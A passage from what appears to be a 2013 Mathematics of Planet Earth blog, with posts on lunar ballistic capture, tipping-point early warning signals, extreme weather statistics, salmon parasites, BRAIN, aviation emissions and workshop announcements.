    Data sets from biomedical imaging, genomics and proteomics often have unique characteristics that differentiate them from other data sets, such as extremely high-dimensionality, high heterogeneity due to different data modalities (across different spatial and temporal scales, but also across different biological layers) that need to be fused, large stochastic components and noise, low sample size and possibly low reproducibility of per-patient data. These unique aspects, as well as the large size, pose challenges to many existing techniques aimed at solving the problems above.

    The workshop will bring together biologists, computer scientists, engineers, mathematicians and statisticians working in a wide of areas of expertise, with the goal of pushing existing techniques, and developing novel ones, for tackling the unique challenges offered by large data sets in biomedical imaging.

  • Posted in Imaging, Workshop Announcement | Leave a comment

    Brain Research through Advancing Innovative Neurotechnologies (BRAIN)

    Earlier this year, President Obama announced a major federal research initiative dubbed the “brain initiative.” According to the initial announcement, its goal was to develop and use imaging techniques to better understand neural processes and brain function.

    Recently, the U.S. National Institutes of Health provided more details on a possible program in Brain Research through Advancing Innovative Neurotechnologies (BRAIN). Plans are for this initiative to begin in 2014 (the 2014 fiscal year starts October 1, 2013). The report lists various research priorities; among these, according to Science (Vol. 341, page 1325, 20 September 2013) are “classifying brain cells, studying how they connect, and identifying how patterns of activity among them produce behavior.”

    Mathematics can play a crucial role in this research. Mathematicians Jennifer Chayes and Nancy Kopell were among the “expert consultants” in the study that led to the report (Report, page 56-57).

    To get a sense of the role mathematics can play one need only look at the research of Nancy Kopell, one of many people studying neural activity from a dynamical systems perspective. Kopell studies rhythmic behavior in networks of neurons—what biophysical mechanisms produce them, and what functions they serve. Kopell delivered SIAM’s 2007 John von Neumann Lecture. A March 2007 article on Kopell in SIAM News describes some of this research. An earlier SIAM News article from May 2003, by Dana Mackenzie, also described possible implications of this research on understanding brain-related diseases, such as Parkinson’s disease.

    Studying patterns of behavior through the dynamic interactions of neurons remains a very active of research among mathematicians in the field of applied dynamical systems.

    Posted in Biology, Dynamical Systems, Patterns | Leave a comment

    Simons Public Lecture by Professor L. Mahadevan

    On September 24, 2013, I had the pleasure of attending the seventh in the nine-lecture MPE2013 Simons Public Lecture Series. The talk was held on the beautiful campus of Brown University in Providence, Rhode Island, and was attended by nearly 600 people, including entire bus-loads of high-school students.

    The hosting institution for this talk was the Institute for Computational and Experimental Research in Mathematics (ICERM). The crowd was welcomed by ICERM director Jill Pipher; Peter Jones, Director of the Applied Mathematics Program at Yale University, introduced the keynote speaker of the event, Professor L. Mahadevan of Harvard University. Professor Mahadevan’s research interests revolve around understanding the physical and biological organization of matter and how it is shaped, moves and flows, particularly at the scale of the everyday world. He uses both quantitative experiments and theoretical studies to probe questions over a range of scales.

    Professor Mahadevan’s talk was entitled “On Growth and Form: Mathematics, Physics and Biology,” after the book “On Growth and Form” by D’Arcy Wentworth Thompson. In his talk, Professor Mahadevan explored how issues of form are at their core mathematical problems. He explained how pollen tubes grow, leaves ripple, flowers bloom and guts loop. He gave very engaging examples of each, using visual aids and a series of slides to explain how mathematics is used to help solve ongoing questions of growth and form.

    Public Lecture - Prof. L. Mahadevan

    The lecture was followed by a reception for 50 special guests at the home of Brown University President Christine Paxson.

    The Brown Daily Herald reported on the lecture in an article entitled “Lecturer explains nature with mathematical principles,&#8221 by its Staff Writer Alex Constantino in its issue of September 25, 2013.

    Sponsored by the Simons Foundation, the MPE2013 Simons Public Lecture Series is taking place at nine locations around the world. Each lecturer is a leading expert who will explain how the mathematical sciences play a significant role in understanding and solving some of Planet Earth’s important problems. Our communities’ best expositors and champions will cover a diverse range of topics in lectures aimed for a public audience. Previous talks have been held in Melbourne, San Francisco, Cape Town, Montreal, Chapel Hill and Berlin. The remaining two talks will be held Minneapolis on October 8th (“The Evolution of Cooperation: Why We Need Each Other to Succeed,” by Martin Nowak), and Los Angeles (“Quantum Mechanics and the Future of the Planet,” by Emily Carter).

    Christine Marshall
    Program Manager
    Mathematical Sciences Research Institute
    17 Gauss Way
    Berkeley, CA 94720
    Tel. (510) 642-0555

    Posted in Public Event | Leave a comment

    New Ways to the Moon, Origin of the Moon, and Origin of Life on Earth

    The field of celestial mechanics is an old one, going back to 90 AD when Claudius Ptolemy sought to describe the motions of the planets. However, the modern field of celestial mechanics goes back to the 1700s when Joseph-Louis Lagrange studied the celebrated three-body problem for the motion of three mass points under the influence of the force of gravity. Henri Poincaré in the late 19th and early 20th century made huge advances in our understanding of the three-body problem, with new methods employing what we call today dynamical systems theory. Much of his work was focused on a special version of the three-body problem, namely the planar circular restricted three-body problem, where two mass points move in circular orbits about their common center of mass, in a plane, while a third point of zero mass moves in the same plane under the influence of the gravity of the two mass points. One can imagine these two bodies to be the Earth and the Moon, while the zero mass point can be a rock, for example a meteorite. Poincaré’s work indicated that the motion of the zero mass point could be very complex and very sensitive, so much so that it would be chaotic.

    If one considers the motion of a small object, say a spacecraft that is going to the Moon, under the gravitational influence of both the Earth and the Moon, then a standard route to the Moon from the Earth is called a Hohmann transfer, after the work of the engineer Walter Hohmann in the 1920s. This yields a flight time of about 3 days. The path is not chaotic since the spacecraft is going fairly fast; in fact, it looks almost linear. When a spacecraft approaches the Moon on this transfer, it needs to slow down a lot, by about 1 kilometer per second, in order to be captured into lunar orbit. This requires a lot of fuel, which is very expensive—about a million dollars per pound!

    Is there a better way? Is there a way to find a transfer to the Moon that is captured into lunar orbit automatically, without the use of rocket engines? The answer was not known until 1986, when the writer of this article (Edward Belbruno) found a way to do it. His 1987 paper was the first to demonstrate the process of ballistic capture—a transfer from the Earth that took 2 years to reach the Moon and resulted in automatic capture. In fact, the author showed that the region about the Moon where this capture can occur is one where the spacecraft must arrive slowly enough relative to the Moon. Then the balance of the gravitational tugs of the Earth and the Moon on the moving spacecraft cause the motion of the captured spacecraft to be chaotic. This region is called today the weak stability boundary.

    In 1991, this methodology was put to the test when the author found a new route to the Moon to rescue the Japanese spacecraft, Hiten, which successfully arrived there in October of that year (Figure 1). This route was a more practical 5 months in duration and actually needed to use the more complex four-body problem model between the Earth, Moon, Sun and spacecraft. This route has to make use of not only the weak stability boundary of the Moon for ballistic capture, but also the weak stability boundary of the Earth due to the Earth and Sun gravitational interaction, which occurs about 1.5 million kilometers from the Earth. The spacecraft got to the Moon in ballistic capture by first flying out 4 times the Earth-Moon distance to 1.5 million kilometers, then falling back to the Moon for ballistic capture. This type of route, called an exterior Weak Stability Boundary (WSB) transfer, was used by NASA’s GRAIL mission in 2011. The original 2-year ballistic capture transfer was used by the European mission SMART-1 in 2004. There are plans to use them for many more space missions in the future.

    Hiten Spacecraft

    Figure 1. Hiten spacecraft

    These ballistic capture transfers are also referred to as low-energy transfers since less energy is used in the capture process. Since the capture occurs in the weak stability boundary, they are also referred to as WSB transfers, or more simply as weak transfers. When a spacecraft is moving in the weak stability boundary for capture, it is roughly analogous to a surfer catching a wave.

    In 2005, a different application of weak transfer was published by the author and J.R. Gott III as a way to explain where the giant Mars-sized impactor that is hypothesized to have collided with the Earth to form the Moon from the remnants of the collision, came from. The mechanism is called the Theia Hypothesis, for the hypothesized impactor called Theia. The hypothesis is that Theia could have been formed in one of the equilateral Lagrange points in the Earth-Sun system, which are two locations 60 degrees ahead of the Earth and behind the Earth, on the Earth’s orbit about the Sun (Figure 2). These locations are stable, where a particle of negligible mass will be trapped. The hypothesis is that Theia formed by accretion of many small rocks, called planetesimals, over millions of years. As Theia was forming it gradually moved away from the Lagrange point locations where it was weakly captured. It eventually escaped onto a weak transfer from the Lagrange region and hit the Earth with low energy. NASA investigated this theory in 2009, when it sent its two STEREO spacecraft to these regions to look for any residual material. Since the spacecraft were not originally designed to look for this type of material, their search was inconclusive.

    Lagrangian Points L1, L2, L3, L4, L5

    Figure 2. The five Lagrange points, L1, L2, L3, L4, L5

    A very interesting application of weak transfer on the origin of life on Earth was recently published by the author, Amaya Moro-Martin, Renu Malhotra and Dmitry Savransky (BMMS) in 2012 in the journal Astrobiology. They considered a special type of cluster of stars, called an open star cluster, which is a loose aggregate of stars moving slowly with respect to each other with relative velocities of about one kilometer per second. It is thought by many that the Sun formed in such a cluster about 5 billion years ago. They were trying to understand the validity of the Lithopanspermia Hypothesis. This hypothesis is that rocks containing biogenic material were ejected from a given planetary system of a star, S1, and captured by another star, for example the Sun. Eventually, some of the rocks would crash onto the Earth. Previous studies of this problem dealt with high-velocity ejection of rocks from S1, on the order of 6 kilometers per second. They found that the probability of capture of these rocks by another star, for example the Sun, was negligible, being essentially zero. The study by BMMS, taking 8 years, utilized very low-velocity escape from S1, on the order of 50 meters per second, and examined the likelihood of weak capture by the Sun. They found that the probability increased by an order of one billion! This implies that about 3 billion rocks could have impacted the Earth over the time spans considered of about 400 million years. The time spans involved coincided nicely with the emergence of live on Earth.

    Last, we mention that the weak stability boundary is a very interesting region about one of the mass points, for example, in the planar circular restricted three-body problem. An interesting result on the properties of this region was published by F. Garcia and Gerard Gomez in 2005. This was further studied by the author, Marian Gidea and Francesco Topputo in several publications since 2005, where this boundary, say about the Moon, is shown to be a subset of a very complex region consisting of invariant manifolds associated to the collinear Lagrange points, L1, L2. (Figure 3)

    weak stability boundary about the Moon at center.

    Figure 3. Slice of weak stability boundary (red boundary region) about the Moon at center.

    Edward Belbruno
    Department of Astrophysical Sciences
    Princeton University

    Posted in Transportation | 1 Comment

    Is Natural Gas Clean?

    There is an interesting opinion article in this week’s Wednesday New York Times, “Is natural gas `clean’?” by Mark Bittman. He argues that yes, it is cleaner than coal – it produces 50% less carbon dioxide than coal when burned – but still not clean. And, importantly, the methane that can escape into the atmosphere during any part of the harvesting of natural gas is far worse than burning coal. If more than 3% escapes then we’re actually better off just burning coal. But no one actually knows how much is lost in total from all the wells. Measuring and monitoring the amount of escapage is difficult and costly. Might that money be better spent developing the infrastructure for truly clean enery such as solar and wind?

    The links in this article are really good. Be sure to follow the Boston one. And I look forward to watching the new series “Years of living dangerously” that Bittman has been a part of. You can read Mark Bittman’s article here.

    Posted in Energy, Sustainability | Leave a comment

    Statistics of Extreme Events

    The floods that occurred earlier this month in Colorado remind us once again of the increasing talk about extreme weather events. This discussion has been going on for some time in the media, starting perhaps with the European heat wave of 2003, and has continued to this day—the Russian heat wave of 2010; the floods in Pakistan in 2012; and the enormous storm named Sandy that hit the Atlantic coast of the U.S. in 2012.

    We hear in the media that the rain storms that hit Colorado this year are the worst since 1893. Are such extreme weather events becoming more common? If so, to what extent can they be attributed to climate change?

    As Richard Smith, Director of the Statistical and Applied Mathematical Sciences Institute (SAMSI) pointed out in a recent talk, these are not simple questions to ask, but statistical analysis is making progress on ways to answer such questions.

    While Smith points out that there is empirical evidence that extreme events are becoming more frequent, there is no universal agreement that it is due to climate change or anthropogenic contributions. And quantifying how frequent extreme events may become in the future, regardless of its causes, remains an area of research.

    Smith offers some possible approaches to developing techniques to answering these questions, combing extreme value theory with hierarchical models. Details on these techniques may be found in his talk.

    This talk was one of several in a minisymposium on Inference in Climate Studies. Audio recordings, synchronized with the slides, are available for listening/viewing.

    Together these talks show some of the research in the mathematical and statistical sciences on climate studies. Some of these are also part of a larger field of research, known to mathematicians as uncertainty quantification, whose goal it is to better quantify errors in large-scale computational models.

    Posted in Climate, Extreme Events, Statistics, Weather | Leave a comment

    Scientific Research on Sustainability and Its Impact on Policy and Management

    I recently had the opportunity to lecture on “Aquaculture and Sustainability of Coastal Ecosystems” at the NSF-funded Mathematical Biosciences Institute (MBI) in Columbus, Ohio. The MBI focuses on different theme programs; in the fall of 2013 the theme program is Ecosystem Dynamics and Management. In my lecture, I focused on work done over the last 10 years, with grad students and colleagues, on disease transfer between aquaculture and wild salmon. This turns out to be a key issue for sustainability of wild salmon, particularly pink salmon, in coastal ecosystems

    Our work investigates the dynamics of parasite spill-over and spill back between wild salmon and aquaculture. It employs mathematical methods, such as dynamical systems and differential equations, to analyze the biological processes. It also involves large amounts of data collected by field researchers on wild and domestic salmon parasites. Over the years, the work has received a great deal of scientific and public scrutiny. Our results, showing how aquaculture can impact wild salmon populations has been enthusiastically endorsed by some and has also been criticized by others. However, it has connected to policy makers and to the general public, and we believe that it can and has made a difference in how we manage aquaculture. A reflection on how scientific research can impact policy and decision making is given in a new book Bioeconomics of Invasive species: Integrating Ecology, Economics, Policy and Management. The reference is:

    Keller, R.P., Lewis, M.A., Lodge, D.M., Shogren, J.F., Krkošek, M. Putting bioeconomic research into practice. In: R.P Keller, D.M. Lodge, M.A. Lewis and J.F. Shogren, (eds.), Bioeconomics of Invasive Species: Integrating Ecology, Economics and Management. (Ch 13, pp 266-284). Oxford University Press.

    The lecture has been recorded and can be viewed here.

    Mark Lewis
    University of Alberta
    mark.lewis@ualberta.ca

    Posted in Ecology, Resource Management, Sustainability | Leave a comment

    ICMS Workshop: Early Warning Signs of Tipping

    In a previous post, Kaitlin gave a great overview of the recent ICMS Tipping Points workshop. Today we will continue that conversation with a detailed look at efforts to understand and detect early warning signs of tipping.

    Mathematical framework

    Three mathematical mechanisms for tipping have been developed:

    • B-tipping: there is an abrupt transition between alternative steady states that occurs due to a bifurcation.
    • N-tipping: a rare noise event drives a transition between bistable states.
    • R-tipping: a system parameter is varied too rapidly, causing trajectories to depart from the dynamics of the static bifurcation diagram.

    A simple example of B-tipping occurs in the Stommel box model for ocean convection [2]. By increasing a freshwater forcing parameter in that model, one could force a rapid transition between thermally driven and salinity driven ocean states. Here, the transition occurs due to a saddle-node bifurcation. This turns out to be a relatively generic mechanism that is often used as the prototypical example of B-tipping: after the bifurcation point is crossed, trajectories depart the locally stable state to some alternatively stable state in such a way that the change is irreversible.

    N-tipping occurs when a system exhibits bistability and there is sufficient variability in the system’s state, presumably due to noise imposed on the system, that trajectories are pushed from one equilibrium to another. The noise, perhaps a large magnitude rare event, must push the system’s state out of an equilibrium’s basin of attraction and into that of another. For this reason, the size of an equilibrium’s basin of attraction is a fundamental measure of a system’s resilience.

    The last framework, R-tipping, depends on the rate at which a parameter varies with time. In a system where a single equilibrium is stable for all values of a parameter, trajectories go unstable for large excursions in phase space (due to excitability or other mechanisms) for a variation of the parameter that exceeds a critical rate. This mechanism may occur in peatland ecosystems, which are susceptible to excitability in the form of combustion.

    In this report we focus on B- and N-tipping, though R-tipping is developed thoroughly by Wieczorek et al. in a paper describing the compost bomb instability [3].

    Early Warning Signs

    Is it possible to predict tipping in advance? Surprisingly, the answer is “yes” for many systems that can undergo B-tipping. The best known precursor results from the effect of critical slowing down on a weakly noisy signal. For systems with a deterministic component and a stochastic component (introduced perhaps as a stand-in for dynamics that happen on a fast time scale), statistical characteristics of the noise in the resulting output may change approaching a bifurcation.

    Take a deterministic system with a saddle-node bifurcation as an example. A stable state of the system is characterized by the pull captured by the eigenvalues of the linearized system. These eigenvalues have negative real part. Approaching a bifurcation point by varying a parameter, one of these eigenvalues approaches zero. The pull of the system in the corresponding eigendirection diminishes, and so perturbations to the steady state close to the bifurcation point take increasingly long to return. Noise added on can be thought of roughly as repeated perturbation to the deterministic system. We expect that noise away from the bifurcation point will quickly die down to the steady state. Close to the bifurcation though, noise can push the system away from its steady state. If the noise is regular, and satisfies some modest criteria [4], then one would expect the noise (relative to the deterministic signal) to become more correlated and more volatile approaching the saddle node bifurcation. Thus, given certain criteria, one would expect to see signals in the autocorrelation function of the noise and in the variance of the noise as a system approaches a bifurcation point.

    Intrinsic noise occurs in many natural systems, and given that the underlying dynamics of a system roughly satisfy the criteria of critical slowing-down methods, one may search for increased autocorrelation and variance in noise from real data. One source of data that may be conducive to this kind of analysis is the paleoclimate proxy record. These proxies are correspondences between strongly correlated variables within the climate, like correspondences between oxygen isotope ratios (which can be observed in ice-core records) and past temperature. If one were to assume that there was some strongly deterministic signal in the proxies recording Dansgaard-Oeschger events, then the noise about this signal could be analyzed for increased correlation and variance. Dakos et al. do this for a number of proxy records, and find increased autocorrelation signals approaching what appear to be abrupt transitions [5].

    This sort of analysis may provide a test of critical slowing-down methods, as abrupt transitions can be readily observed in these records. However, it is unclear whether these transitions constitute what we characterize as tipping. It is possible that dynamics were such that a small change of parameters had a large impact on the system state, but in a reversible way. In this case, no bifurcation occurs. Rather, there is a single steady state that is stable throughout the transition.

    Figure from [4].

    Since the rate of change of the steady state with respect to the parameter is steep, one may also expect to see some of the same hallmarks of critical slowing down that one would see with a bifurcation. Though in either hypothesis the state of the system is strongly affected, the existence of a bifurcation may imply bistability and hysteresis, and therefore some degree irreversibility. By comparison, an abrupt transition that is brought on by a steep response curve should be reversible.

    Another caveat is that in many cases, the size of a steady state’s basin of attraction decreases approaching the bifurcation point. When there is bistability, noise can more easily push the trajectory of a system out of the basin of one steady state and into another. A transition that happens this way is considered N-tipping. N-tipping transitions depend on a rare event in the noise process causing the system to transition between bistable states. For this reason, prediction in this case is difficult. N-tipping near a bifurcation point presents an important limitation in the use of critical slowing down as an early warning sign. Critical slowing down cannot necessarily give information about when a transition will occur, but simply that it can occur. This, though perhaps unsatisfying, is still useful. If one can identify aspects of the climate that bear the hallmarks of critical slowing down, then measures can be taken to reverse the direction of change to avoid catastrophic transition.

    Figure from [6]

    While these signals are generic in the sense that they may appear wherever the generic saddle-node bifurcation mechanism occurs, many have cautioned against using these indicators without some understanding of the underlying dynamics. In particular, one must avoid the prosecutor’s fallacy, which in probabilistic terms means that $P(A|B)$ ≠ $P(B|A)$ unless $P(A)$ = $P(B)$. In the context of early warning signs, we can think of $A$ as “the occurrence of B-tipping” and $B$ as “the appearance of early warning signs”. Simply put, observing a warning sign does not imply that B-tipping is occurring! It is important to formulate a mathematical model because a model can be analyzed, criticized, and modified. This is key to a sound hypothesis about what is observed in data. If the model is consistent with a bifurcation-induced transition, then this lends credence to the hypothesis that increased correlation and variance herald tipping.

    Early warning signs derived from critical slowing down offer promise as broadly applicable tests for a natural system’s resilience to change and proximity to abrupt transition. They are certainly not foolproof: in addition to the pitfalls listed above, one must be careful to verify that the noise satisfies certain statistical properties and that the results are significant (which requires a sufficiently large number of observations). It has been shown that lag-1 autocorrelation used in conjunction with variance minimize Type I and II error in controlled settings [7]. With some additional modeling, it may be possible to develop even more precise indicators for a specific system.

    References:

      [1] “Tipping points: fundamentals and applications.” International Centre for Mathematical Sciences, n.d. Web. 16 Sept. 2013.
      [2] Stommel, H. (1961). Thermohaline convection with two stable regimes of flow. Tellus, 13(2), 224–230.
      [3] Wieczorek S, et al. (2011) Excitability in ramped systems: The compost-bomb instability, Proceedings of the Royal Society A: Mathematical, Physical and Engineering Sciences, vol. 467, no. 2129, pages 1243-1269.
      [4] Scheffer, M. et al. (2009) Early-warning signals for critical transitions. Nature 461, 53-59.
      [5] Dakos, V., et al. (2008) Slowing down as an early warning signal for abrupt climate change. Proceedings of the National Academy of Sciences of the USA, 105(38), 14308-14312.
      [6] Ditlevsen, P. D., & Johnsen, S. J. (2010). Tipping points: Early warning and wishful thinking. Geophysical Research Letters, 37(19). doi:10.1029/2010GL044486
      [7] Beaulieu, C. Early warning signals for critical transitions: sense, sensitivity and specificity. Invited talk. ICMS Tipping Points: fundamentals and applications. 12 Sept. 2013.

    Karna Gowda
    Northwestern University

    Posted in Complex Systems, Mathematics, Tipping Phenomena | 1 Comment

    Musings on Summer Travel

    Thanks to the affordability of air travel nowadays, an increasing number of us have the opportunity to visit exotic locations around the globe. Back in my student days, I was enthralled by the idea of attending conferences in cultural centers like Paris and Edinburgh, as well as remote villages like Les Houches in the French Alps, or Cargèse in Corsica. The idea of pitching a tent next to the beach and spending a week learning about the latest developments in theoretical physics made me feel like I was the luckiest person in the world. Back then I didn’t think twice about the unintended consequences of my travels, but now that the scientific case for anthropogenic global warming (AGW) is firmly established, we scientists can no longer ignore the externalities of our summer gatherings.

    A comprehensive analysis of the evolution of scientific consensus for AGW was published recently in Environmental Physics Letters [1]. The study identified more than 4,000 abstracts that stated a position on the cause of global warming out of 11,944 in the peer reviewed scientific literature over the last 21 years. Out of these 97% endorsed the view that human activity is the unambiguous cause of such trends. The study found that “the number of papers rejecting the consensus on AGW is a vanishingly small proportion of the published research.”

    Unfortunately, the degree of consensus within the academic community is poorly represented in the popular media, and there continues to be widespread public perception that climate scientists disagree about the significance of human activity in driving these changes. Indeed a 2012 poll showed that although an increasing number of Americans believe there is now solid evidence indicating global warming, more than half still either disagree with, or are otherwise unaware of the consensus among scientists that human activity is the root cause of this increase [2].

    The ability to implement effective climate policy is noticeably impaired by the public’s confusion over the position of climate scientists. In the Pew Research Center’s annual policy priorities survey, just 28% said that dealing with global warming should be a top priority, ranking climate policy last amongst the 21 priorities tested [3].

    Since becoming involved with MPE2013, I’ve tried to develop a better understanding of the work of climate scientists, as well as the economic and technological challenges we must face to meet future energy demands. Although many of my colleagues share similar concerns about the urgency of addressing AGW, very few have made any significant changes to their personal/professional life choices. As members of the academic community, the intellectual milieu in which we work exposes us to trends and ideas far ahead of their widespread adoption, just think of our use of information technology and the Web. But various lunchtime conversations on the topic soon made me realize how difficult it will be to bring about the kind of awareness necessary to meet the challenges of global issues like climate change, even amongst the educated elite. On this point I must say that I’m personally grateful to everyone who has worked so hard to make MPE2013 a success.

    Before last year I’d never estimated my carbon footprint, let alone compared it to those of my friends and colleagues from abroad. But after attending an MPE planning meeting, I started following activities and some of the topics kindled a sense of personal responsibility quite beyond the usual intellectual curiosity I might feel for other disciplines. I hope one of the legacies of MPE2013 will be an influx of new talent into the wide-range of intricate mathematical problems highlighted in the lectures, workshops and conferences currently taking place around the world.

    But I also hope that many more of us will take note of a science that connects us back to the world in which we live, and a greater personal awareness of the energy choices we make in our lives. So if you’ve never taken the time before, I think you might enjoy playing with one of the various carbon calculators available on the Web. The US Environmental Protection Agency has one on their web site, or National Geographic has a personal “energy meter” that is both educational and easy to share with your neighbors and friends. You might be surprised to see how you measure up to your non-academic peers. Are you part of the energy avant-garde, or lagging the national average? How you fare may crucially depend on whether you frequently visit international colleagues, or have a penchant for traveling abroad to conferences and workshops. In an article on January 26 this year, the New York Times suggested “your biggest carbon sin may be air travel”. Have you ever purchased carbon credits to offset your flights, or would you consider declining an invitation for a professional meeting to reduce your score? Some airlines and several of the popular online travel agencies offer the opportunity to purchase offsets when you buy your air tickets. If your haven’t adopted any such scheme, you are not alone, indeed you are in good company! As reported in the January New York Times article cited above:

      Last fall, when Democrats and Republicans seemed unable to agree on anything, one bill glided through Congress with broad bipartisan support and won a quick signature from President Obama: the European Union Emissions Trading Scheme Prohibition Act of 2011. This odd law essentially forbids United States airlines from participating in the European Union Emissions Trading System, Europe’s somewhat lonely attempt to rein in planet-warming emissions.

    Under this program, the aviation sector was next in line to join other industries in Europe and start paying for emissions generated by flights into and out of EU destinations. After an uproar from both governments and airlines, as well as a slew of lawsuits from the United States, India and China, the European Commission delayed full implementation for one year to allow an alternative global plan to emerge.

    But already back in 2007, the most contentious matter on the 36th assembly of the International Civil Aviation Organization’s (ICAO) agenda was the environmental impact of international aviation. Stratospheric ozone depletion and poor air quality at ground level are also effects of aircraft emissions, and although the Kyoto Protocol of 1997 assigned the ICAO the task of reducing the impact of aircraft engine emissions, so far the organization has resisted measures that would impose mandatory fuel taxes or emissions standards.

    This set the stage for a legal dispute of gargantuan proportions between the ICAO’s European member countries and foreign airlines and governments who do not want to comply. The ICAO’s general assembly meets once every three years, and the 38th Assembly is due to begin next week on September 24. The hottest topic on the agenda is sure to be the pending EU legislation and the need to find common ground on aviation emissions standards and trading, but what position will the United States, India and China now adopt?

    In his 2013 Inaugural Address, President Obama promised to make dealing with climate change part of his second-term agenda. The volume of air travel is increasing much faster than gains in fuel efficiency, and emissions from many other sectors are falling. The meetings taking place at the ICAO assembly next week could be some of the most significant in the fight against AGW this year, but will our government finally take the lead in bringing about the kind of binding legislation our planet so desperately needs?

    References:

    [1] John Cook et al., 2013 Environ. Res. Lett. 8 024024
    [2] More Say There Is Solid Evidence of Global Warming – Pew Research Center – Monday, October 4-7, 2012
    [3] Climate Change: Key Data Points from Pew Research – Monday, June 24, 2013

    David Alexandre Ellwood
    davidalexandreellwood@gmail.com

    Posted in General, Transportation | Leave a comment

    Math for Weather, Bacteria, Aircraft

    In the September issue of the Notices of the AMS is a book review of Invisible in the Storm: The Role of Mathematics in Understanding Weather by Ian Roulstone and John Norbury. The review is by Peter Lynch. The book is a history of the development of mathematical models for weather prediction and at least from the review, it sounds like a valuable source for non-mathematicians and mathematicians alike. You can read the review here.

    There have also been two items recently highlighted by the AMS in their “Mathematical Sciences on the Newswires” section that are of particular interest to MPE2013 community. Both were published in Science Daily. The first is the article “Simple Math Sheds New Light On a Long-Studied Biological Process”, and it focuses on some very simple basic mathematics that surprisingly helps explain the adaptation of bacteria.

    The other story is “Stabilizing Aircraft During Takeoff and Landing Using Math” and again emphasizes that the right mathematical model provides insights in the design features of aircraft and helps adjust for optimum stability.

    Estelle Basor
    American Institute of Mathematics

    Posted in Biology, Mathematics, Weather | Leave a comment

    Vector Transmission of Plant Viruses

    Plant Virus

    Photo Credit: Howard F. Schwartz, Bugwood.org

    One of the greatest limiting factors to modern agriculture are plant viruses. Climate change and the emergence of new viral strains affect the health and biodiversity of crops and of plants in general, while the continued growth of the human population emphasizes the need for sustainable agriculture.

    In terms of conservation and biodiversity, a significant number of invasion events around the world have been associated with the presence of pathogens. Invasion success depends on the increased relative fitness of the invader as compared to the native species. A classic example of this is the Barley/Cereal Yellow Dwarf Virus (B/CYDV), with its massive invasion of native perennial grasslands in western Oregon and California introduced by annual grasses. B/CYDV in the United States, African Cassava Mosaic Virus and others require a deeper study of plant physiology and epidemiology in crop models and economic models, as well as a better understanding of the effects of climate change and control measures to curtail economic losses.

    Mathematical, statistical and computational methods can contribute to problems in vector transmission of plant viruses. Areas to focus on include the impact of climate change on plants, vectors and viral transmission, the environmental determinants of plant growth, temperature, timing and soil nutrients, the effect of plant genetics on viral persistence, vector dispersal and behavior on pathogen transmission and other facts such as co-infection on transmission.

    The problems in vector transmission of plant viruses are multi-scale and highly dependent on environmental variables. Thus, multidisciplinary teams with expertise in biology and mathematics are needed to solve these problems.

    In March, the National Institute for Mathematical and Biological Synthesis (NIMBioS) will host an Investigative Workshop on Vectored Plant Viruses, which will provide a forum for discussion of current problems on vectored transmission of plant viruses, with the goal of identifying mathematical, computational, and statistical methods, as well as insights derived using these methods.

    This workshop will bring together experts in plant pathogens, agronomy, and vector and plant virology, physiology, and ecology with mathematical and statistical modelers to discuss problems in prevention and control of vector transmission of plant pathogens. It is expected that the workshop will lead to new collaborations and working groups on methods for prevention and control of vector transmission of plant viruses, which promote sustainable agricultural practices and reduce species invasions.

    Co-organizing the workshop are Linda J. S. Allen (Mathematics and Statistics, Texas Tech Univ., Lubbock); Vrushali A. Bokil (Mathematics, Oregon State Univ., Corvallis); Elizabeth T. Borer (Ecology & Evolutionary Biology, Univ. of Minnesota, Minneapolis); Alison G. Power (Ecology & Evolutionary Biology, Cornell Univ., Ithaca, NY); and Frank Van Den Bosch (Computational and Systems Biology, Rothamsted Research, Hertfordshire, UK).

    If you have an interest in these topics, the workshop is still accepting applications. The application deadline is Oct. 28, 2013. Individuals with a strong interest in the topic, including post-docs and graduate students, are encouraged to apply. Click here for more information and on-line registration.

    NIMBioS Investigative Workshops focus on broad topics or a set of related topics, summarizing/synthesizing the state of the art and identifying future directions. Organizers and key invited researchers make up approximately one half the 30-40 participants in a workshop, and the remaining 15-20 participants are filled through open application from the scientific community. If needed, NIMBioS can provide support (travel, meals, lodging) for Workshop attendees.

    Posted in Biodiversity, Climate Change, Workshop Announcement | Leave a comment

    MPE-themed Issue of “Nieuw Archief voor Wiskunde”

    What is a wave attractor? How can we “see” below the Earth’s surface while staying above ground? And what does desertification have to do with balloons?

    These and other topics are discussed in the September 2013 issue of the Nieuw Archief voor Wiskunde (NAW, translated as “New Archive for Mathematics”), the quarterly journal of the Royal Mathematical Society (KWG) of the Netherlands. The NAW is aimed at a broad audience: anyone professionally involved in mathematics, whether as an academic or industrial researcher, student, teacher, journalist or decision maker.

    The September 2013 issue of the NAW is dedicated to Mathematics of Planet Earth (MPE) and contains 11 articles and two interviews revolving around the MPE theme. Topics vary from phytoplankton to lightning and from El Niño to sand banks. The articles become freely available online one year after publication. Most of the articles are in Dutch, and for those readers who do not speak Dutch or who want to read about these topics now rather than later, I will give a brief overview of the articles. In most cases, further information and relevant research papers can be found on the authors’ Web sites.

    The MPE-themed issue of NAW starts with an article by Alef Sterk (University of Twente), Renato Vitolo (University of Exeter, UK) and Henk Broer (University of Groningen) about extreme-value statistics for deterministic dynamical systems. The classical theory of extreme values concerns random variables. Recently, researchers have started to investigate statistics of extremes in dynamical systems with chaotic behavior. This topic is relevant for the study of meteorological extremes, as many atmosphere models can be regarded as (highly complex) dynamical systems.

    In the next article, Arnold Heemink (TU Delft) and Peter Jan van Leeuwen (University of Reading, UK) review the most important current data assimilation methods. Among atmosphere and ocean scientists, data assimilation is the technique for systematically combining models and observations. It is an important aspect, for example, of operational weather prediction. Modern data assimilation methods build on ideas from optimal control and filter theory, and the development of these methods is a very active area of research where both mathematicians and atmosphere– and ocean scientists are involved.

    Internal waves are waves below the surface of a lake or ocean. They are caused by density stratification and rotation of the Earth and behave very differently from free surface waves. This is related to the non-separability of the wave equation, as explained by Theo Gerkema and Leo Maas (NIOZ, Netherlands Institute for Ocean Research). In many water basins with sloping boundaries, the internal waves can get “caught” (or focused) in specific locations, forming a so-called wave attractor.

    At the bottom of the sea, another interesting type of pattern formation can occur. Henk Schuttelaars (TU Delft) and Huib de Swart (University of Utrecht) discuss morphodynamics, the formation and evolution of patterns such as sand banks and beach cusps by sediment transport in shallow seas. These can be studied by formulating and analyzing nonlinear models combining fluid flow, sediment transport, and bottom topography.

    The next article brings us from the bottom to the surface of the ocean. Brenny van Groesen (University of Twente) and Frits van Beckum describe a variational formulation for the motion of the ocean surface. This formulation preserves the Hamiltonian structure of the equations for the surface motion, making it very suitable for modeling and simulation of free surface waves. The authors present several examples, such as wave focusing, the occurrence of freak waves, and prediction of waves from radar observations.

